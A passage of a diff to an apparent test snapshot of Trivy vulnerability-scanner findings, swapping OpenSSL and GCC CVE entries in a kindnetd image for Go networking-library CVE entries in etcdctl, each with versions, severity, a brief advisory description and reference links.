"https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p52g-cm5j-mjv4", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4304.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4304", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0007.html", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4304", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0465", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0465", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", - "https://linux.oracle.com/cve/CVE-2023-0465.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0465", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", - ], - }, - "category": "Vulnerability", - "description": "Applications that use a non-default option when verifying certificates may be -vulnerable to an attack from a malicious CA to circumvent certain checks. - -Invalid certificate policies in leaf certificates are silently ignored by -OpenSSL and other certificate policy checks are skipped for that certificate. -A malicious CA could use this to deliberately assert invalid certificate policies -in order to circumvent policy checking on the certificate altogether. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "Invalid certificate policies in leaf certificates are silently ignored", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0465", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0465", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0465", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=10325176f3d3e98c6e2b3bf5ab1e3b334de6947a", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1dd43e0709fece299b15208f36cc7c76209ba0bb", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=b013765abfa80036dc779dd0e50602c57bb3bf95", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=facfb1ab745646e97a1920977ae4a9965ea61d5c", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0465.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0465", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0465", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u5", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0466", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0466", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", - "https://linux.oracle.com/cve/CVE-2023-0466.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", - "https://security.netapp.com/advisory/ntap-20230414-0001/", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0466", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230328.txt", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "The function X509_VERIFY_PARAM_add0_policy() is documented to -implicitly enable the certificate policy check when doing certificate -verification. However the implementation of the function does not -enable the check which allows certificates with invalid or incorrect -policies to pass the certificate verification. - -As suddenly enabling the policy check could break existing deployments it was -decided to keep the existing behavior of the X509_VERIFY_PARAM_add0_policy() -function. - -Instead the applications that require OpenSSL to perform certificate -policy check need to use X509_VERIFY_PARAM_set1_policies() or explicitly -enable the policy check by calling X509_VERIFY_PARAM_set_flags() with -the X509_V_FLAG_POLICY_CHECK flag argument. - -Certificate policy checks are disabled by default in OpenSSL and are not -commonly used by applications.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "Certificate policy check not enabled", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0466", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0466", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0466", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=0d16b7e99aafc0b4a6d729eec65a411a7e025f0a", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=51e8a84ce742db0f6c70510d0159dad8f7825908", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=73398dea26de9899fb4baa94098ad0a61f435c72", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fc814a30fc4f0bc54fcea7d9a7462f5457aab061", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0466.html", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0466", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230414-0001/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6039-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0466", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://www.debian.org/security/2023/dsa-5417", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230328.txt", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-6755", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", - "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", - "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", - "http://rump2007.cr.yp.to/15-shumow.pdf", - "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", - "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", - "http://www.securityfocus.com/bid/63657", - "https://access.redhat.com/security/cve/CVE-2007-6755", - "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", - "https://www.cve.org/CVERecord?id=CVE-2007-6755", - "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "The NIST SP 800-90A default statement of the Dual Elliptic Curve Deterministic Random Bit Generation (Dual_EC_DRBG) algorithm contains point Q constants with a possible relationship to certain "skeleton key" values, which might allow context-dependent attackers to defeat cryptographic protection mechanisms by leveraging knowledge of those values. NOTE: this is a preliminary CVE for Dual_EC_DRBG; future research may provide additional details about point Q and associated attacks, and could potentially lead to a RECAST or REJECT of this CVE.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "Dual_EC_DRBG: weak pseudo random number generator", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-6755", - }, - { - "type": "URL", - "value": "http://arstechnica.com/security/2013/09/stop-using-nsa-influence-code-in-our-product-rsa-tells-customers/", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/rsa-warns-developers-against-its-own.html", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "http://blog.cryptographyengineering.com/2013/09/the-many-flaws-of-dualecdrbg.html", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "http://rump2007.cr.yp.to/15-shumow.pdf", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "http://stream.wsj.com/story/latest-headlines/SS-2-63399/SS-2-332655/", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "http://threatpost.com/in-wake-of-latest-crypto-revelations-everything-is-suspect", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/63657", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2007-6755", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2007-6755", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2007-6755", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://www.schneier.com/blog/archives/2007/11/the_strange_sto.html", + "value": "https://go.dev/cl/455635", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-0928", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", - "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", - "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", - "http://www.osvdb.org/62808", - "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", - "https://access.redhat.com/security/cve/CVE-2010-0928", - "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", - "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", - "https://www.cve.org/CVERecord?id=CVE-2010-0928", - ], - }, - "category": "Vulnerability", - "description": "OpenSSL 0.9.8i on the Gaisler Research LEON3 SoC on the Xilinx Virtex-II Pro FPGA uses a Fixed Width Exponentiation (FWE) algorithm for certain signature calculations, and does not verify the signature before providing it to a caller, which makes it easier for physically proximate attackers to determine the private key via a modified supply voltage for the microprocessor, related to a "fault-based attack."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "openssl: RSA authentication weakness", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-0928", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "http://rdist.root.org/2010/03/08/attacking-rsa-exponentiation-with-fault-injection/", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "http://www.eecs.umich.edu/%7Evaleria/research/publications/DATE10RSA.pdf", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "http://www.networkworld.com/news/2010/030410-rsa-security-attack.html", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "http://www.osvdb.org/62808", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "http://www.theregister.co.uk/2010/03/04/severe_openssl_vulnerability/", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-0928", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56750", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-0928", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-0928", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-12886", - "installedVersion": "8.3.0-6", - "packageName": "libstdc++6", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'usr/local/bin/etcdctl-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", + "packageName": "golang.org/x/sys", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-12886", - "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", - "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", - "https://www.cve.org/CVERecord?id=CVE-2018-12886", - "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "stack_protect_prologue in cfgexpand.c and stack_protect_epilogue in function.c in GNU Compiler Collection (GCC) 4.1 through 8 (under certain circumstances) generate instruction sequences when targeting ARM targets that spill the address of the stack protector guard, which allows an attacker to bypass the protection of -fstack-protector, -fstack-protector-all, -fstack-protector-strong, and -fstack-protector-explicit against stack overflow by controlling what the stack canary is compared against.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "gcc: spilling of stack protection address in cfgexpand.c and function.c leads to stack-overflow protection bypass", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-12886", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-12886", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://gcc.gnu.org/viewcvs/gcc/trunk/gcc/config/arm/arm-protos.h?revision=266379&view=markup", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-12886", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-12886", + "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", }, { "type": "URL", - "value": "https://www.gnu.org/software/gcc/gcc-8/changes.html", + "value": "https://github.com/golang/go/issues/52313", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-15847", - "installedVersion": "8.3.0-6", - "packageName": "libstdc++6", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", - "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", - "https://access.redhat.com/security/cve/CVE-2019-15847", - "https://gcc.gnu.org/bugzilla/show_bug.cgi?id=91481", - "https://linux.oracle.com/cve/CVE-2019-15847.html", - "https://linux.oracle.com/errata/ELSA-2020-1864.html", - "https://nvd.nist.gov/vuln/detail/CVE-2019-15847", - "https://www.cve.org/CVERecord?id=CVE-2019-15847", - ], - }, - "category": "Vulnerability", - "description": "The POWER9 backend in GNU Compiler Collection (GCC) before version 10 could optimize multiple calls of the __builtin_darn intrinsic into a single call, thus reducing the entropy of the random number generator. This occurred because a volatile operation was not specified. For example, within a single execution of a program, the output of every __builtin_darn() call may be the same.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "gcc: POWER9 "DARN" RNG intrinsic produces repeated output", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-15847", + "value": "https://go.dev/cl/399539", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00056.html", + "value": "https://go.dev/cl/400074", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00057.html", + "value": "https://go.dev/issue/52313", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-05/msg00058.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": 